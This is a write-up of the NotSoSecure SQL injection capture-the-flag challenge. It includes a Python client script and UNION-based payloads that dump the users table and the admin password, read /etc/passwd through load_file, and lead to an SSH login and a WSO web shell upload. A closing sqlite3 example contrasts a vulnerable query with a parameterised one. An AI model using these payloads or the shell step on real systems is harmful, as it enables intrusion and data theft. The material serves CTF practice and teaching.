NotSoSecure SQLi CTF – writeup

Access the challenge through a proxy like Burp or ZAP and submit data to the login form. Notice that you are forwarded to:
http://ctf.notsosecure.com/71367217217126217712/checklogin.php, which contains the hex string 7365637265745f72656769737465722e68746d6c

This can be decoded with '7365637265745f72656769737465722e68746d6c'.decode('hex') in Python (2), which reads secret_register.html:

>>> '7365637265745f72656769737465722e68746d6c'.decode('hex')
'secret_register.html'

The registration page offers four fields; when you register, a session_id cookie is created, base64-encoded, that contains your email.

A hint was posted on Twitter (https://twitter.com/notsosecure/status/389714333061500928) about magic_quotes. It is a big hint!

We automated our attack in Python:

#!/usr/bin/python
# Python 2 script: register an account whose name carries the payload,
# log in with it, then fetch uber_secret.php and print the session_id
# cookie of the last response (URL-encoded base64), which reflects the
# result of the injected query.
from requests import get, post
from sys import argv
from urllib import unquote

# Arguments, in order: name (payload goes here), password, email.
name = argv[-3]
password = argv[-2]
email = argv[-1]

print 'name:', name
print 'password:', password
print 'email:', email

base = 'http://ctf.notsosecure.com/71367217217126217712/'
url1 = base + 'register.php'
url2 = base + 'checklogin.php'
url3 = base + 'uber_secret.php'

# 1. register, 2. log in with the same credentials, 3. visit the secret page,
# carrying the cookies from each step into the next.
r = get(url1, params={'regname': name, 'regemail': email,
                      'regpass1': password, 'regpass2': password})
r = post(url2, data={'myusername': name, 'mypassword': password}, cookies=r.cookies)
r = get(url3, cookies=r.cookies)

# URL-unquote the cookie, then base64-decode it to get the reflected data.
print 'cookie:', unquote(r.cookies['session_id']).decode('base64')

Get the name of the table (users):

root@bt:~# python x.py "-1' union select GROUP_CONCAT(table_name),2 FROM information_schema.tables where table_schema!='information_schema' -- -" "a" "a"
name: -1' union select GROUP_CONCAT(table_name),2 FROM information_schema.tables where table_schema!='information_schema' -- -
password: a
email: a
seesion_id: users
dXNlcnM%3D

Fields of the table:

root@bt:~# python x.py " -1' union select GROUP_CONCAT(column_name),2 FROM information_schema.columns WHERE table_name = 'users' -- -" "a" "a"
name: -1' union select GROUP_CONCAT(column_name),2 FROM information_schema.columns WHERE table_name = 'users' -- -
password: a
email: a
seesion_id: id,name,password,email
aWQsbmFtZSxwYXNzd29yZCxlbWFpbA%3D%3D

Final data:

root@bt:~# python x.py " -1' union select GROUP_CONCAT(id,name,password,email),2 FROM users where name='admin' -- -" "a" "a"
name: -1' union select GROUP_CONCAT(id,name,password,email),2 FROM users where name='admin' -- -
password: a
email: a
seesion_id: 1adminsqlilabRocKs!!admin@sqlilabs.com
MWFkbWluc3FsaWxhYlJvY0tzISFhZG1pbkBzcWxpbGFicy5jb20%3D

We log in with admin:adminsqlilabRocKs and get the flag: «Well done, Flag is 815290. 2nd flag is in file secret.txt»
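To show why a single quote in the name field turns the lookup into a UNION that returns other rows, here is an added illustration (not the CTF's own server code) that models the query behind the session_id cookie with sqlite3, first built by string formatting and then as a parameterised query. The users(id,name,password,email) schema follows the columns recovered above; the row contents are constructed sample data, and the writeup's payload is adapted to SQLite syntax (GROUP_CONCAT with several arguments becomes ||).

```python
import sqlite3


def make_db():
    # Constructed sample data with the column layout recovered from the challenge.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users(id INTEGER, name TEXT, password TEXT, email TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", [
        (1, "admin", "S3cret-sample", "admin@example.test"),  # constructed, not the real row
        (2, "bob", "hunter2", "bob@example.test"),
    ])
    return db


def lookup_vulnerable(db, name):
    # The broken pattern: the name is pasted into the SQL text, so a quote in it
    # closes the literal and a UNION appends attacker-chosen rows to the result.
    # The query returns two columns, matching the ",2" in the writeup's payloads.
    sql = "SELECT email, id FROM users WHERE name = '%s'" % name
    return [row[0] for row in db.execute(sql)]


def lookup_safe(db, name):
    # Same query with the name bound as a parameter: it can only ever be data,
    # so the payload is compared against the name column and matches nothing.
    sql = "SELECT email, id FROM users WHERE name = ?"
    return [row[0] for row in db.execute(sql, (name,))]


# The writeup's final payload, rewritten for SQLite: -1' closes the literal,
# the UNION pulls the admin row, and "-- -" comments out the trailing quote.
PAYLOAD = ("-1' union select group_concat(id||name||password||email),2 "
           "FROM users where name='admin' -- -")


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", lookup_vulnerable(db, PAYLOAD))  # admin row leaks
    print("safe:      ", lookup_safe(db, PAYLOAD))        # nothing
```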


We use the same client to read /etc/passwd, and see a user temp123 with weakpassword1 visible in its entry:

root@bt:~# python x.py " -1' union select load_file('/etc/passwd'),2 -- -" "a" "a"
name: -1' union select load_file('/etc/passwd'),2 -- -
password: a
email: a
seesion_id:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:103:106::/var/run/dbus:/bin/false
whoopsie:x:104:107::/nonexistent:/bin/false
landscape:x:105:110::/var/lib/landscape:/bin/false
sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
postgres:x:107:112:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
ctf:x:1000:1000:,,,:/home/ctf:/bin/bash
temp123:x:1001:1001:weakpassword1:/home/temp123:/bin/sh
ntop:x:108:116::/var/lib/ntop:/bin/false

Login time

temp123@ctf.notsosecure.com's password:
Welcome to Ubuntu 12.04.3 LTS (GNU/Linux 3.8.0-29-generic x86_64)

* Documentation: https://help.ubuntu.com/

System information as of Fri Oct 25 08:47:07 BST 2013

System load: 0.0 Processes: 174
Usage of /: 4.5% of 28.18GB Users logged in: 2
Memory usage: 3% IP address for eth0: 88.208.239.33
Swap usage: 0%

Graph this data and manage this system at https://landscape.canonical.com/

Last login: Fri Oct 25 08:37:55 2013 from cpc26-cmbg15-2-0-cust101.5-4.cable.virginm.net
$ pwd
/home/temp123

Upload a WSO shell into the user's public_html. Delete the PHP shell afterwards.

$ cat /secret.txt
Well done, 2nd Flag is 128738213812990.

email both the flags to ctf@notsosecure.com with subject CTF FLAGS!

make sure you delete all the files you have created on the server so you don't allow other users easy points by using the files left by you on the server.

Please provide a detailed write up to qualify for cash prize!
The person with the best write-up wins. You are allowed to publish the write-up on a public site, but please do this after the CTF has finished (Sunday, 27th October).

Hope you enjoyed the CTF. This was taken from one of challenges we have on SQLi Labs. To practice more on this visit our SQLi Labs.

The next public CTF will take place in December.

Thanks
Sid
References &amp; URLs

http://ctf.notsosecure.com/leaderboard/
